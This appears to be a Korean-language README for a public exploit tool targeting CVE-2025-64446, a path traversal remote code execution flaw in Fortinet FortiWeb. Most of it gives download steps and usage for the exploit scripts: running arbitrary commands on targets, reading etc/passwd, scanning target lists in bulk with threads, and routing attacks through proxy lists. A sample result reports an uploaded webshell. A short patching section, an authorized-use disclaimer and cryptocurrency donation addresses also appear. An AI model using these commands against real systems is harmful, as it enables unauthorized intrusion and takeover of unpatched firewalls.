
CVE-2025-64446 (FortiWeb Path Traversal RCE 취약점)를 탐지 및 테스트하기 위한 보안 연구 도구
Fortinet FortiWeb 웹 애플리케이션 방화벽(WAF)에서 CVE-2025-64446 취약점을 탐지하고 테스트하기 위한 보안 연구 도구입니다. 이 심각한 제로데이 경로 탐색 취약점은 실제 환경에서 적극적으로 악용되고 있으며, 인증되지 않은 공격자가 보안 제어를 우회하고 임의 코드를 실행할 수 있게 합니다.
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 소유하고 있거나 테스트에 대한 명시적인 서면 허가를 받은 시스템에서만 이 도구를 사용하십시오.
CVE-2025-64446는 Fortinet FortiWeb WAF에서 발견된 심각한 제로데이 경로 탐색 취약점으로, 실제 환경에서 적극적으로 악용되고 있습니다. 이 취약점을 통해 인증되지 않은 공격자는 경로 탐색 공격을 통해 보안 제어를 우회하고 원격 코드 실행, 구성 파일 액세스, 시스템 전체 장악까지 이어질 수 있습니다.
CVSS 점수: 9.8 (심각)
상태: 실제 환경에서 적극적으로 악용됨
CISA KEV: 알려진 악용 취약점 카탈로그에 추가됨
패치: FG-IR-25-910
영향받는 제품: Fortinet FortiWeb WAF
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Install dependencies
pip install -r requirements.txt
# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Install dependencies
pip install requests
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com
# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url 대상 URL
-f, --file 대상 URL이 포함된 파일 (줄당 하나)
-c, --command 실행할 명령 (기본값: id)
-t, --threads 스레드 수 (기본값: 1)
-o, --output 출력 파일 (기본값: uknf_fortiweb_results.json)
-v, --verbose 상세 로깅 활성화
--proxy 프록시 URL (예: http://127.0.0.1:8080)
--proxy-list 프록시 URL이 포함된 파일 (줄당 하나)
스크립트는 상세 결과가 포함된 JSON 파일을 생성합니다:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
FortiWeb WAF를 사용 중인 경우:
보안 업데이트 즉시 적용:
# Check current version
show system status
# Update to latest version
execute upgrade <firmware-file>
네트워크 분할:
구성 강화:
CISA 요구 사항:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com
# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
기여는 언제나 환영합니다! 풀 리퀘스트를 자유롭게 제출해 주세요.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)문제가 발생하거나 제안 사항이 있으면 GitHub에서 이슈를 열어 주세요.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
이 도구가 유용하다면 GitHub에서 스타를 눌러 주시기 바랍니다!
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 저자는 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 시스템을 테스트하기 전에 적절한 권한이 있는지 확인할 책임이 있습니다.
이 도구가 유용하고 프로젝트를 지원하고 싶다면:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
지원해 주셔서 감사합니다! 🙏